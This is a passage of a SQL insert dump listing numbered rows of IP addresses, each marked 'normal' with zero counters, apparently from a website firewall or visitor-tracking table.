3091,'207.244.252.235','normal','',0,0,0,0,0,'[]'),(3092,'103.169.34.239','normal','',0,0,0,0,0,'[]'),(3093,'115.78.160.53','normal','',0,0,0,0,0,'[]'),(3094,'194.244.133.254','normal','',0,0,0,0,0,'[]'),(3095,'18.206.253.21','normal','',0,0,0,0,0,'[]'),(3096,'191.96.180.53','normal','',0,0,0,0,0,'[]'),(3097,'123.31.21.26','normal','',0,0,0,0,0,'[]'),(3098,'68.235.52.36','normal','',0,0,0,0,0,'[]'),(3099,'87.106.228.6','normal','',0,0,0,0,0,'[]'),(3100,'184.168.123.157','normal','',0,0,0,0,0,'[]'),(3101,'81.88.52.20','normal','',0,0,0,0,0,'[]'),(3102,'89.161.220.46','normal','',0,0,0,0,0,'[]'),(3103,'186.64.119.120','normal','',0,0,0,0,0,'[]'),(3104,'103.171.181.142','normal','',0,0,0,0,0,'[]'),(3105,'18.217.142.176','normal','',0,0,0,0,0,'[]'),(3106,'139.99.69.189','normal','',0,0,0,0,0,'[]'),(3107,'38.242.205.84','normal','',0,0,0,0,0,'[]'),(3108,'31.11.36.185','normal','',0,0,0,0,0,'[]'),(3109,'173.44.60.148','normal','',0,0,0,0,0,'[]'),(3110,'113.125.140.19','normal','',0,0,0,0,0,'[]'),(3111,'213.152.161.69','normal','',0,0,0,0,0,'[]'),(3112,'104.194.10.231','normal','',0,0,0,0,0,'[]'),(3113,'79.139.60.88','normal','',0,0,0,0,0,'[]'),(3114,'3.131.4.125','normal','',0,0,0,0,0,'[]'),(3115,'192.249.124.141','normal','',0,0,0,0,0,'[]'),(3116,'162.241.115.107','normal','',0,0,0,0,0,'[]'),(3117,'199.201.110.199','normal','',0,0,0,0,0,'[]'),(3118,'198.38.88.250','normal','',0,0,0,0,0,'[]'),(3119,'222.124.3.203','normal','',0,0,0,0,0,'[]'),(3120,'5.61.28.93','normal','',0,0,0,0,0,'[]'),(3121,'185.191.171.17','normal','',0,0,0,0,0,'[]'),(3122,'186.234.80.231','normal','',0,0,0,0,0,'[]'),(3123,'67.20.114.155','normal','',0,0,0,0,0,'[]'),(3124,'193.112.202.112','normal','',0,0,0,0,0,'[]'),(3125,'5.101.156.133','normal','',0,0,0,0,0,'[]'),(3126,'162.0.210.238','normal','',0,0,0,0,0,'[]'),(3127,'31.187.74.213','normal','',0,0,0,0,0,'[]'),(3128,'128.199.21.138','normal','',0,0,0,0,0,'[]'),(3129,'64.227.160.56','normal','',0,0,0,0,0,'[]'),(3130,'207.148.118.130','normal','',0,0,0,0,0,'[]'),(3131,'54.36.82.134','normal','',0,0,0,0,0,'[]'),(3132,'173.247.254.32','normal','',0,0,0,0,0,'[]'),(3133,'5.101.157.241','normal','',0,0,0,0,0,'[]'),(3134,'66.45.251.157','normal','',0,0,0,0,0,'[]'),(3135,'82.165.86.39','normal','',0,0,0,0,0,'[]'),(3136,'92.222.68.53','normal','',0,0,0,0,0,'[]'),(3137,'114.119.147.58','normal','',0,0,0,0,0,'[]'),(3138,'104.161.80.219','normal','',0,0,0,0,0,'[]'),(3139,'154.197.48.10','normal','',0,0,0,0,0,'[]'),(3140,'194.233.73.177','normal','',0,0,0,0,0,'[]'),(3141,'209.87.239.76','normal','',0,0,0,0,0,'[]'),(3142,'103.153.68.244','normal','',0,0,0,0,0,'[]'),(3143,'209.141.55.206','normal','',0,0,0,0,0,'[]'),(3144,'45.63.13.50','normal','',0,0,0,0,0,'[]'),(3145,'195.178.120.231','normal','',0,0,0,0,0,'[]'),(3146,'35.181.45.81','normal','',0,0,0,0,0,'[]'),(3147,'81.196.171.130','normal','',0,0,0,0,0,'[]'),(3148,'118.195.133.73','normal','',0,0,0,0,0,'[]'),(3149,'180.149.241.246','normal','',0,0,0,0,0,'[]'),(3150,'103.163.138.21','normal','',0,0,0,0,0,'[]'),(3151,'82.223.120.85','normal','',0,0,0,0,0,'[]'),(3152,'35.180.41.227','normal','',0,0,0,0,0,'[]'),(3153,'35.180.41.227','normal','',0,0,0,0,0,'[]'),(3154,'192.99.56.116','normal','',0,0,0,0,0,'[]'),(3155,'194.163.156.168','normal','',0,0,0,0,0,'[]'),(3156,'205.185.117.143','normal','',0,0,0,0,0,'[]'),(3157,'216.250.116.85','normal','',0,0,0,0,0,'[]'),(3158,'87.248.153.52','normal','',0,0,0,0,0,'[]'),(3159,'20.19.162.32','normal','',0,0,0,0,0,'[]'),(3160,'213.187.11.137','normal','',0,0,0,0,0,'[]'),(3161,'157.245.59.110','normal','',0,0,0,0,0,'[]'),(3162,'81.169.144.135','normal','',0,0,0,0,0,'[]'),(3163,'75.119.215.101','normal','',0,0,0,0,0,'[]'),(3164,'66.175.217.71','normal','',0,0,0,0,0,'[]'),(3165,'207.244.246.140','normal','',0,0,0,0,0,'[]'),(3166,'198.46.81.40','normal','',0,0,0,0,0,'[]'),(3167,'82.180.138.212','normal','',0,0,0,0,0,'[]'),(3168,'142.132.157.224','normal','',0,0,0,0,0,'[]'),(3169,'217.21.77.74','normal','',0,0,0,0,0,'[]'),(3170,'178.124.210.118','normal','',0,0,0,0,0,'[]'),(3171,'87.250.224.114','normal','',0,0,0,0,0,'[]'),(3172,'39.106.15.209','normal','',0,0,0,0,0,'[]'),(3173,'49.232.53.124','normal','',0,0,0,0,0,'[]'),(3174,'51.91.83.187','normal','',0,0,0,0,0,'[]'),(3175,'81.68.150.77','normal','',0,0,0,0,0,'[]'),(3176,'159.89.170.41','normal','',0,0,0,0,0,'[]'),(3177,'185.25.23.57','normal','',0,0,0,0,0,'[]'),(3178,'13.126.77.35','normal','',0,0,0,0,0,'[]'),(3179,'144.168.154.131','normal','',0,0,0,0,0,'[]'),(3180,'118.27.125.16','normal','',0,0,0,0,0,'[]'),(3181,'195.206.105.203','normal','',0,0,0,0,0,'[]'),(3182,'101.99.3.20','normal','',0,0,0,0,0,'[]'),(3183,'95.217.226.51','normal','',0,0,0,0,0,'[]'),(3184,'202.74.239.117','normal','',0,0,0,0,0,'[]'),(3185,'178.20.231.167','normal','',0,0,0,0,0,'[]'),(3186,'188.166.211.48','normal','',0,0,0,0,0,'[]'),(3187,'72.167.51.34','normal','',0,0,0,0,0,'[]'),(3188,'104.227.21.249','normal','',0,0,0,0,0,'[]'),(3189,'72.9.145.140','normal','',0,0,0,0,0,'[]'),(3190,'191.101.31.17','normal','',0,0,0,0,0,'[]'),(3191,'46.252.18.29','normal','',0,0,0,0,0,'[]'),(3192,'114.119.148.208','normal','',0,0,0,0,0,'[]'),(3193,'205.185.124.182','normal','',0,0,0,0,0,'[]'),(3194,'47.106.207.43','normal','',0,0,0,0,0,'[]'),(3195,'14.225.3.211','normal','',0,0,0,0,0,'[]'),(3196,'47.111.130.128','normal','',0,0,0,0,0,'[]'),(3197,'40.127.0.239','normal','',0,0,0,0,0,'[]'),(3198,'5.101.157.25','normal','',0,0,0,0,0,'[]'),(3199,'212.146.128.154','normal','',0,0,0,0,0,'[]'),(3200,'35.196.106.151','normal','',0,0,0,0,0,'[]'),(3201,'45.149.77.114','normal','',0,0,0,0,0,'[]'),(3202,'64.207.178.246','normal','',0,0,0,0,0,'[]'),(3203,'103.121.88.59','normal','',0,0,0,0,0,'[]'),(3204,'167.99.206.99','normal','',0,0,0,0,0,'[]'),(3205,'139.180.157.5','normal','',0,0,0,0,0,'[]'),(3206,'167.99.149.140','normal','',0,0,0,0,0,'[]'),(3207,'216.137.180.105','normal','',0,0,0,0,0,'[]'),(3208,'148.72.214.59','normal','',0,0,0,0,0,'[]'),(3209,'45.63.27.156','normal','',0,0,0,0,0,'[]'),(3210,'131.153.50.250','normal','',0,0,0,0,0,'[]'),(3211,'184.168.116.151','normal','',0,0,0,0,0,'[]'),(3212,'139.59.227.94','normal','',0,0,0,0,0,'[]'),(3213,'64.42.179.59','normal','',0,0,0,0,0,'[]'),(3214,'72.9.158.112','normal','',0,0,0,0,0,'[]'),(3215,'185.104.184.43','normal','',0,0,0,0,0,'[]'),(3216,'185.191.171.11','normal','',0,0,0,0,0,'[]'),(3217,'217.174.248.107','normal','',0,0,0,0,0,'[]'),(3218,'176.74.192.85','normal','',0,0,0,0,0,'[]'),(3219,'13.126.107.146','normal','',0,0,0,0,0,'[]'),(3220,'37.187.24.159','normal','',0,0,0,0,0,'[]'),(3221,'51.75.146.208','normal','',0,0,0,0,0,'[]'),(3222,'144.76.76.11','normal','',0,0,0,0,0,'[]'),(3223,'54.36.148.219','normal','',0,0,0,0,0,'[]'),(3224,'5.101.156.219','normal','',0,0,0,0,0,'[]'),(3225,'162.241.217.237','normal','',0,0,0,0,0,'[]'),(3226,'184.154.69.85','normal','',0,0,0,0,0,'[]'),(3227,'109.86.225.205','normal','',0,0,0,0,0,'[]'),(3228,'193.28.89.40','normal','',0,0,0,0,0,'[]'),(3229,'5.101.156.45','normal','',0,0,0,0,0,'[]'),(3230,'61.12.67.132','normal','',0,0,0,0,0,'[]'),(3231,'31.4.182.11','normal','',0,0,0,0,0,'[]'),(3232,'162.241.148.12','normal','',0,0,0,0,0,'[]'),(3233,'54.36.148.14','normal','',0,0,0,0,0,'[]'),(3234,'67.225.255.231','normal','',0,0,0,0,0,'[]'),(3235,'178.128.85.69','normal','',0,0,0,0,0,'[]'),(3236,'186.239.19.230','normal','',0,0,0,0,0,'[]'),(3237,'136.243.11.143','normal','',0,0,0,0,0,'[]'),(3238,'37.57.218.243','normal','',0,0,0,0,0,'[]'),(3239,'185.225.73.129','normal','',0,0,0,0,0,'[]'),(3240,'3.73.57.1','normal','',0,0,0,0,0,'[]'),(3241,'20.197.10.147','normal','',0,0,0,0,0,'[]'),(3242,'173.252.95.17','normal','',0,0,0,0,0,'[]'),(3243,'173.252.95.16','normal','',0,0,0,0,0,'[]'),(3244,'173.252.95.8','normal','',0,0,0,0,0,'[]'),(3245,'213.152.186.173','normal','',0,0,0,0,0,'[]'),(3246,'113.142.131.55','normal','',0,0,0,0,0,'[]'),(3247,'184.75.221.163','normal','',0,0,0,0,0,'[]'),(3248,'157.55.39.83','normal','',0,0,0,0,0,'[]'),(3249,'95.108.213.53','normal','',0,0,0,0,0,'[]'),(3250,'96.47.229.59','normal','',0,0,0,0,0,'[]'),(3251,'81.29.196.68','normal','',0,0,0,0,0,'[]'),(3252,'82.156.197.214','normal','',0,0,0,0,0,'[]'),(3253,'159.89.202.42','normal','',0,0,0,0,0,'[]'),(3254,'40.77.202.121','normal','',0,0,0,0,0,'[]'),(3255,'182.18.144.189','normal','',0,0,0,0,0,'[]'),(3256,'188.166.254.93','normal','',0,0,0,0,0,'[]'),(3257,'91.134.248.192','normal','',0,0,0,0,0,'[]'),(3258,'103.110.86.9','normal','',0,0,0,0,0,'[]'),(3259,'68.183.22.104','normal','',0,0,0,0,0,'[]'),(3260,'34.148.69.84','normal','',0,0,0,0,0,'[]'),(3261,'207.244.248.44','normal','',0,0,0,0,0,'[]'),(3262,'142.93.157.162','normal','',0,0,0,0,0,'[]'),(3263,'23.230.235.89','normal','',0,0,0,0,0,'[]'),(3264,'23.230.235.29','normal','',0,0,0,0,0,'[]'),(3265,'23.230.235.227','normal','',0,0,0,0,0,'[]'),(3266,'23.230.235.190','normal','',0,0,0,0,0,'[]'),(3267,'40.122.149.171','normal','',0,0,0,0,0,'[]'),(3268,'51.159.15.23','normal','',0,0,0,0,0,'[]'),(3269,'54.218.124.236','normal','',0,0,0,0,0,'[]'),(3270,'35.89.214.177','normal','',0,0,0,0,0,'[]'),(3271,'34.148.246.46','normal','',0,0,0,0,0,'[]'),(3272,'114.119.148.49','normal','',0,0,0,0,0,'[]'),(3273,'156.146.63.142','normal','',0,0,0,0,0,'[]'),(3274,'80.87.194.140','normal','',0,0,0,0,0,'[]'),(3275,'144.126.159.4','normal','',0,0,0,0,0,'[]'),(3276,'108.179.253.75','normal','',0,0,0,0,0,'[]'),(3277,'178.128.156.230','normal','',0,0,0,0,0,'[]'),(3278,'185.33.54.15','normal','',0,0,0,0,0,'[]'),(3279,'15.235.138.120','normal','',0,0,0,0,0,'[]'),(3280,'185.247.139.21','normal','',0,0,0,0,0,'[]'),(3281,'45.14.224.167','normal','',0,0,0,0,0,'[]'),(3282,'15.235.97.24','normal','',0,0,0,0,0,'[]'),(3283,'5.255.231.130','normal','',0,0,0,0,0,'[]'),(3284,'95.108.213.22','normal','',0,0,0,0,0,'[]'),(3285,'130.162.192.249','normal','',0,0,0,0,0,'[]'),(3286,'198.46.81.47','normal','',0,0,0,0,0,'[]'),(3287,'157.245.246.208','normal','',0,0,0,0,0,'[]'),(3288,'162.241.126.46','normal','',0,0,0,0,0,'[]'),(3289,'162.240.216.162','normal','',0,0,0,0,0,'[]'),(3290,'194.242.56.232','normal','',0,0,0,0,0,'[]'),(3291,'114.119.150.9','normal','',0,0,0,0,0,'[]'),(3292,'46.229.214.93','normal','',0,0,0,0,0,'[]'),(3293,'23.97.183.204','normal','',0,0,0,0,0,'[]'),(3294,'31.170.166.130','normal','',0,0,0,0,0,'[]'),(3295,'185.107.113.246','normal','',0,0,0,0,0,'[]'),(3296,'209.151.148.49','normal','',0,0,0,0,0,'[]'),(3297,'50.59.99.98','normal','',0,0,0,0,0,'[]'),(3298,'79.143.85.14','normal','',0,0,0,0,0,'[]'),(3299,'137.184.132.157','normal','',0,0,0,0,0,'[]'),(3300,'217.21.74.40','normal','',0,0,0,0,0,'[]'),(3301,'185.250.202.147','normal','',0,0,0,0,0,'[]'),(3302,'51.124.226.192','normal','',0,0,0,0,0,'[]'),(3303,'125.124.125.235','normal','',0,0,0,0,0,'[]'),(3304,'46.17.172.162','normal','',0,0,0,0,0,'[]'),(3305,'139.180.158.189','normal','',0,0,0,0,0,'[]'),(3306,'128.199.207.63','normal','',0,0,0,0,0,'[]'),(3307,'34.86.229.13','normal','',0,0,0,0,0,'[]'),(3308,'65.108.155.244','normal','',0,0,0,0,0,'[]'),(3309,'154.38.163.180','normal','',0,0,0,0,0,'[]'),(3310,'213.52.130.41','normal','',0,0,0,0,0,'[]'),(3311,'107.178.232.184','normal','',0,0,0,0,0,'[]'),(3312,'107.178.232.184','normal','',0,0,0,0,0,'[]'),(3313,'212.192.246.33','normal','',0,0,0,0,0,'[]'),(3314,'217.21.74.42','normal','',0,0,0,0,0,'[]'),(3315,'162.213.249.210','normal','',0,0,0,0,0,'[]'),(3316,'89.184.155.89','normal','',0,0,0,0,0,'[]'),(3317,'46.28.3.42','normal','',0,0,0,0,0,'[]'),(3318,'103.154.184.152','normal','',0,0,0,0,0,'[]'),(3319,'34.138.253.14','normal','',0,0,0,0,0,'[]'),(3320,'171.244.15.68','normal','',0,0,0,0,0,'[]'),(3321,'43.252.230.8','normal','',0,0,0,0,0,'[]'),(3322,'81.88.52.216','normal','',0,0,0,0,0,'[]'),(3323,'138.201.61.46','normal','',0,0,0,0,0,'[]'),(3324,'207.46.13.148','normal','',0,0,0,0,0,'[]'),(3325,'209.141.36.112','normal','',0,0,0,0,0,'[]'),(3326,'172.105.42.19','normal','',0,0,0,0,0,'[]'),(3327,'103.110.84.132','normal','',0,0,0,0,0,'[]'),(3328,'182.79.46.50','normal','',0,0,0,0,0,'[]'),(3329,'104.251.216.88','normal','',0,0,0,0,0,'[]'),(3330,'194.27.156.245','normal','',0,0,0,0,0,'[]'),(3331,'89.46.109.113','normal','',0,0,0,0,0,'[]'),(3332,'192.99.34.140','normal','',0,0,0,0,0,'[]'),(3333,'188.132.174.112','normal','',0,0,0,0,0,'[]'),(3334,'162.214.92.6','normal','',0,0,0,0,0,'[]'),(3335,'173.212.201.41','normal','',0,0,0,0,0,'[]'),(3336,'184.75.221.59','normal','',0,0,0,0,0,'[]'),(3337,'185.114.245.109','normal','',0,0,0,0,0,'[]'),(3338,'144.202.93.42','normal','',0,0,0,0,0,'[]'),(3339,'52.178.114.226','normal','',0,0,0,0,0,'[]'),(3340,'103.171.180.165','normal','',0,0,0,0,0,'[]'),(3341,'20.150.223.169','normal','',0,0,0,0,0,'[]'),(3342,'149.255.62.28','normal','',0,0,0,0,0,'[]'),(3343,'34.73.180.20','normal','',0,0,0,0,0,'[]'),(3344,'111.223.36.152','normal','',0,0,0,0,0,'[]'),(3345,'190.171.170.94','normal','',0,0,0,0,0,'[]'),(3346,'45.77.131.169','normal','',0,0,0,0,0,'[]'),(3347,'23.224.36.205','normal','',0,0,0,0,0,'[]'),(3348,'81.88.52.222','normal','',0,0,0,0,0,'[]'),(3349,'34.254.111.139','normal','',0,0,0,0,0,'[]'),(3350,'91.231.84.41','normal','',0,0,0,0,0,'[]'),(3351,'101.99.95.162','normal','',0,0,0,0,0,'[]'),(3352,'185.181.60.189','normal','',0,0,0,0,0,'[]'),(3353,'185.2.6.13','normal','',0,0,0,0,0,'[]'),(3354,'46.226.80.84','normal','',0,0,0,0,0,'[]'),(3355,'14.116.150.68','normal','',0,0,0,0,0,'[]'),(3356,'162.241.253.222','normal','',0,0,0,0,0,'[]'),(3357,'64.124.8.30','normal','',0,0,0,0,0,'[]'),(3358,'199.249.230.22','normal','',0,0,0,0,0,'[]'),(3359,'103.86.176.182','normal','',0,0,0,0,0,'[]'),(3360,'202.61.232.79','normal','',0,0,0,0,0,'[]'),(3361,'35.225.94.95','normal','',0,0,0,0,0,'[]'),(3362,'38.242.135.133','normal','',0,0,0,0,0,'[]'),(3363,'162.215.240.160','normal','',0,0,0,0,0,'[]'),(3364,'207.246.108.230','normal','',0,0,0,0,0,'[]'),(3365,'103.145.50.127','normal','',0,0,0,0,0,'[]'),(3366,'13.237.121.70','normal','',0,0,0,0,0,'[]'),(3367,'52.172.40.95','normal','',0,0,0,0,0,'[]'),(3368,'47.94.219.115','normal','',0,0,0,0,0,'[]'),(3369,'81.68.222.69','normal','',0,0,0,0,0,'[]'),(3370,'196.50.5.129','normal','',0,0,0,0,0,'[]'),(3371,'62.109.150.208','normal','',0,0,0,0,0,'[]'),(3372,'144.208.67.117','normal','',0,0,0,0,0,'[]'),(3373,'112.78.4.244','normal','',0,0,0,0,0,'[]'),(3374,'62.210.181.102','normal','',0,0,0,0,0,'[]'),(3375,'103.145.51.200','normal','',0,0,0,0,0,'[]'),(3376,'185.210.145.8','normal','',0,0,0,0,0,'[]'),(3377,'64.64.237.75','normal','',0,0,0,0,0,'[]'),(3378,'134.122.42.249','normal','',0,0,0,0,0,'[]'),(3379,'173.212.215.38','normal','',0,0,0,0,0,'[]'),(3380,'103.180.120.176','normal','',0,0,0,0,0,'[]'),(3381,'87.236.20.180','normal','',0,0,0,0,0,'[]'),(3382,'91.214.169.69','normal','',0,0,0,0,0,'[]'),(3383,'173.236.194.143','normal','',0,0,0,0,0,'[]'),(3384,'209.141.33.65','normal','',0,0,0,0,0,'[]'),(3385,'114.119.129.184','normal','',0,0,0,0,0,'[]'),(3386,'54.38.44.6','normal','',0,0,0,0,0,'[]'),(3387,'67.225.142.105','normal','',0,0,0,0,0,'[]'),(3388,'104.248.195.12','normal','',0,0,0,0,0,'[]'),(3389,'47.242.107.149','normal','',0,0,0,0,0,'[]'),(3390,'103.247.11.77','normal','',0,0,0,0,0,'[]'),(3391,'196.13.207.197','normal','',0,0,0,0,0,'[]'),(3392,'217.151.98.168','normal','',0,0,0,0,0,'[]'),(3393,'194.99.104.35','normal','',0,0,0,0,0,'[]'),(3394,'18.195.88.209','normal','',0,0,0,0,0,'[]'),(3395,'116.179.32.21','normal','',0,0,0,0,0,'[]'),(3396,'116.179.33.15','normal','',0,0,0,0,0,'[]'),(3397,'116.179.32.207','normal','',0,0,0,0,0,'[]'),(3398,'116.179.32.38','normal','',0,0,0,0,0,'[]'),(3399,'116.179.37.165','normal','',0,0,0,0,0,'[]'),(3400,'173.212.197.26','normal','',0,0,0,0,0,'[]'),(3401,'213.152.162.74','normal','',0,0,0,0,0,'[]'),(3402,'20.198.3.243','normal','',0,0,0,0,0,'[]'),(3403,'35.187.118.85','normal','',0,0,0,0,0,'[]'),(3404,'87.106.229.31','normal','',0,0,0,0,0,'[]'),(3405,'35.229.113.85','normal','',0,0,0,0,0,'[]'),(3406,'116.203.131.1','normal','',0,0,0,0,0,'[]'),(3407,'20.39.196.202','normal','',0,0,0,0,0,'[]'),(3408,'23.236.249.118','normal','',0,0,0,0,0,'[]'),(3409,'67.222.131.158','normal','',0,0,0,0,0,'[]'),(3410,'114.119.133.83','normal','',0,0,0,0,0,'[]'),(3411,'138.199.14.142','normal','',0,0,0,0,0,'[]'),(3412,'187.32.188.214','normal','',0,0,0,0,0,'[]'),(3413,'159.223.63.152','normal','',0,0,0,0,0,'[]'),(3414,'120.24.52.65','normal','',0,0,0,0,0,'[]'),(3415,'34.148.246.193','normal','',0,0,0,0,0,'[]'),(3416,'113.125.51.198','normal','',0,0,0,0,0,'[]'),(3417,'14.29.231.172','normal','',0,0,0,0,0,'[]'),(3418,'107.122.245.77','normal','',0,0,0,0,0,'[]'),(3419,'107.122.245.77','normal','',0,0,0,0,0,'[]'),(3420,'198.98.48.183','normal','',0,0,0,0,0,'[]'),(3421,'64.124.8.52','normal','',0,0,0,0,0,'[]'),(3422,'64.124.8.52','normal','',0,0,0,0,0,'[]'),(3423,'20.77.6.2','normal','',0,0,0,0,0,'[]'),(3424,'20.255.59.83','normal','',0,0,0,0,0,'[]'),(3425,'34.219.136.110','normal','',0,0,0,0,0,'[]'),(3426,'34.213.62.197','normal','',0,0,0,0,0,'[]'),(3427,'35.91.45.100','normal','',0,0,0,0,0,'[]'),(3428,'18.237.231.187','normal','',0,0,0,0,0,'[]'),(3429,'5.255.253.173','normal','',0,0,0,0,0,'[]'),(3430,'20.14.99.78','normal','',0,0,0,0,0,'[]'),(3431,'107.151.6.226','normal','',0,0,0,0,0,'[]'),(3432,'148.72.210.140','normal','',0,0,0,0,0,'[]'),(3433,'108.167.151.32','normal','',0,0,0,0,0,'[]'),(3434,'64.225.4.20','normal','',0,0,0,0,0,'[]'),(3435,'66.249.66.59','normal','',0,0,0,0,0,'[]'),(3436,'181.214.218.57','normal','',0,0,0,0,0,'[]'),(3437,'66.249.66.57','normal','',0,0,0,0,0,'[]'),(3438,'91.196.124.216','normal','',0,0,0,0,0,'[]'),(3439,'66.249.66.65','normal','',0,0,0,0,0,'[]'),(3440,'210.211.113.130','normal','',0,0,0,0,0,'[]'),(3441,'66.249.66.133','normal','',0,0,0,0,0,'[]'),(3442,'157.230.38.184','normal','',0,0,0,0,0,'[]'),(3443,'66.249.66.9','normal','',0,0,0,0,0,'[]'),(3444,'51.124.206.22','normal','',0,0,0,0,0,'[]'),(3445,'35.231.63.8','normal','',0,0,0,0,0,'[]'),(3446,'181.214.206.127','normal','',0,0,0,0,0,'[]'),(3447,'66.249.66.193','normal','',0,0,0,0,0,'[]'),(3448,'66.249.66.61','normal','',0,0,0,0,0,'[]'),(3449,'184.73.106.20','normal','',0,0,0,0,0,'[]'),(3450,'72.29.76.78','normal','',0,0,0,0,0,'[]'),(3451,'156.67.73.38','normal','',0,0,0,0,0,'[]'),(3452,'66.249.66.67','normal','',0,0,0,0,0,'[]'),(3453,'68.183.177.20','normal','',0,0,0,0,0,'[]'),(3454,'66.249.66.131','normal','',0,0,0,0,0,'[]'),(3455,'82.165.88.95','normal','',0,0,0,0,0,'[]'),(3456,'185.232.14.51','normal','',0,0,0,0,0,'[]'),(3457,'91.189.176.172','normal','',0,0,0,0,0,'[]'),(3458,'104.196.14.91','normal','',0,0,0,0,0,'[]'),(3459,'202.226.37.184','normal','',0,0,0,0,0,'[]'),(3460,'198.71.48.115','normal','',0,0,0,0,0,'[]'),(3461,'88.99.248.98','normal','',0,0,0,0,0,'[]'),(3462,'185.224.138.16','normal','',0,0,0,0,0,'[]'),(3463,'129.143.253.19','normal','',0,0,0,0,0,'[]'),(3464,'45.227.254.12','normal','',0,0,0,0,0,'[]'),(3465,'114.119.141.79','normal','',0,0,0,0,0,'[]'),(3466,'66.249.66.69','normal','',0,0,0,0,0,'[]'),(3467,'217.21.95.107','normal','',0,0,0,0,0,'[]'),(3468,'18.218.76.173','normal','',0,0,0,0,0,'[]'),(3469,'82.165.88.11','normal','',0,0,0,0,0,'[]'),(3470,'156.67.222.155','normal','',0,0,0,0,0,'[]'),(3471,'34.170.190.194','normal','',0,0,0,0,0,'[]'),(3472,'184.168.115.171','normal','',0,0,0,0,0,'[]'),(3473,'104.131.93.3','normal','',0,0,0,0,0,'[]'),(3474,'217.21.85.126','normal','',0,0,0,0,0,'[]'),(3475,'65.108.231.155','normal','',0,0,0,0,0,'[]'),(3476,'79.110.62.245','normal','',0,0,0,0,0,'[]'),(3477,'114.119.148.64','normal','',0,0,0,0,0,'[]'),(3478,'192.99.147.218','normal','',0,0,0,0,0,'[]'),(3479,'185.81.4.146','normal','',0,0,0,0,0,'[]'),(3480,'146.56.186.107','normal','',0,0,0,0,0,'[]'),(3481,'66.249.66.195','normal','',0,0,0,0,0,'[]'),(3482,'45.77.245.245','normal','',0,0,0,0,0,'[]'),(3483,'35.185.104.170','normal','',0,0,0,0,0,'[]'),(3484,'147.182.131.65','normal','',0,0,0,0,0,'[]'),(3485,'35.197.84.101','normal','',0,0,0,0,0,'[]'),(3486,'57.128.129.28','normal','',0,0,0,0,0,'[]'),(3487,'66.249.66.13','normal','',0,0,0,0,0,'[]'),(3488,'185.34.32.183','normal','',0,0,0,0,0,'[]'),(3489,'185.2.4.104','normal','',0,0,0,0,0,'[]'),(3490,'34.207.124.111','normal','',0,0,0,0,0,'[]'),(3491,'3.34.104.242','normal','',0,0,0,0,0,'[]'),(3492,'116.203.69.223','normal','',0,0,0,0,0,'[]'),(3493,'217.69.15.37','normal','',0,0,0,0,0,'[]'),(3494,'178.62.213.234','normal','',0,0,0,0,0,'[]'),(3495,'34.69.250.12','normal','',0,0,0,0,0,'[]'),(3496,'181.214.218.46','normal','',0,0,0,0,0,'[]'),(3497,'34.219.105.219','normal','',0,0,0,0,0,'[]'),(3498,'54.212.46.147','normal','',0,0,0,0,0,'[]'),(3499,'35.89.165.237','normal','',0,0,0,0,0,'[]'),(3500,'13.235.54.21','normal','',0,0,0,0,0,'[]'),(3501,'5.101.157.191','normal','',0,0,0,0,0,'[]'),(3502,'144.91.117.122','normal','',0,0,0,0,0,'[]'),(3503,'149.28.155.211','normal','',0,0,0,0,0,'[]'),(3504,'59.106.13.177','normal','',0,0,0,0,0,'[]'),(3505,'45.79.47.25','normal','',0,0,0,0,0,'[]'),(3506,'82.156.16.146','normal','',0,0,0,0,0,'[]'),(3507,'20.125.141.209','normal','',0,0,0,0,0,'[]'),(3508,'77.75.77.36','normal','',0,0,0,0,0,'[]'),(3509,'173.252.83.16','normal','',0,0,0,0,0,'[]'),(3510,'84.54.23.178','normal','',0,0,0,0,0,'[]'),(3511,'15.161.131.84','normal','',0,0,0,0,0,'[]'),(3512,'142.93.168.95','normal','',0,0,0,0,0,'[]'),(3513,'139.180.135.86','normal','',0,0,0,0,0,'[]'),(3514,'153.92.0.19','normal','',0,0,0,0,0,'[]'),(3515,'185.180.143.143','normal','',0,0,0,0,0,'[]'),(3516,'149.56.160.167','normal','',0,0,0,0,0,'[]'),(3517,'144.217.135.199','normal','',0,0,0,0,0,'[]'),(3518,'3.210.202.179','normal','',0,0,0,0,0,'[]'),(3519,'148.153.64.181','normal','',0,0,0,0,0,'[]'),(3520,'162.55.131.89','normal','',0,0,0,0,0,'[]'),(3521,'193.136.232.254','normal','',0,0,0,0,0,'[]'),(3522,'185.2.4.140','normal','',0,0,0,0,0,'[]'),(3523,'20.28.169.52','normal','',0,0,0,0,0,'[]'),(3524,'167.86.99.163','normal','',0,0,0,0,0,'[]'),(3525,'212.227.9.224','normal','',0,0,0,0,0,'[]'),(3526,'23.230.235.32','normal','',0,0,0,0,0,'[]'),(3527,'23.230.235.137','normal','',0,0,0,0,0,'[]'),(3528,'23.230.235.57','normal','',0,0,0,0,0,'[]'),(3529,'23.230.235.238','normal','',0,0,0,0,0,'[]'),(3530,'23.230.235.30','normal','',0,0,0,0,0,'[]'),(3531,'54.173.234.63','normal','',0,0,0,0,0,'[]'),(3532,'185.107.113.222','normal','',0,0,0,0,0,'[]'),(3533,'3.224.109.39','normal','',0,0,0,0,0,'[]'),(3534,'142.93.132.237','normal','',0,0,0,0,0,'[]'),(3535,'5.255.253.162','normal','',0,0,0,0,0,'[]'),(3536,'92.205.161.6','normal','',0,0,0,0,0,'[]'),(3537,'74.208.59.232','normal','',0,0,0,0,0,'[]'),(3538,'5.161.119.55','normal','',0,0,0,0,0,'[]'),(3539,'91.134.248.249','normal','',0,0,0,0,0,'[]'),(3540,'44.204.251.158','normal','',0,0,0,0,0,'[]'),(3541,'61.221.35.27','normal','',0,0,0,0,0,'[]'),(3542,'128.199.152.152','normal','',0,0,0,0,0,'[]'),(3543,'92.53.96.165','normal','',0,0,0,0,0,'[]'),(3544,'66.249.68.57','normal','',0,0,0,0,0,'[]'),(3545,'185.182.57.45','normal','',0,0,0,0,0,'[]'),(3546,'103.138.188.142','normal','',0,0,0,0,0,'[]'),(3547,'143.198.134.153','normal','',0,0,0,0,0,'[]'),(3548,'80.190.117.244','normal','',0,0,0,0,0,'[]'),(3549,'44.236.207.248','normal','',0,0,0,0,0,'[]'),(3550,'157.230.44.8','normal','',0,0,0,0,0,'[]'),(3551,'44.203.119.127','normal','',0,0,0,0,0,'[]'),(3552,'173.247.249.96','normal','',0,0,0,0,0,'[]'),(3553,'45.119.82.214','normal','',0,0,0,0,0,'[]'),(3554,'185.2.4.23','normal','',0,0,0,0,0,'[]'),(3555,'139.99.149.60','normal','',0,0,0,0,0,'[]'),(3556,'45.61.188.225','normal','',0,0,0,0,0,'[]'),(3557,'34.139.115.151','normal','',0,0,0,0,0,'[]'),(3558,'114.119.147.75','normal','',0,0,0,0,0,'[]'),(3559,'43.129.81.132','normal','',0,0,0,0,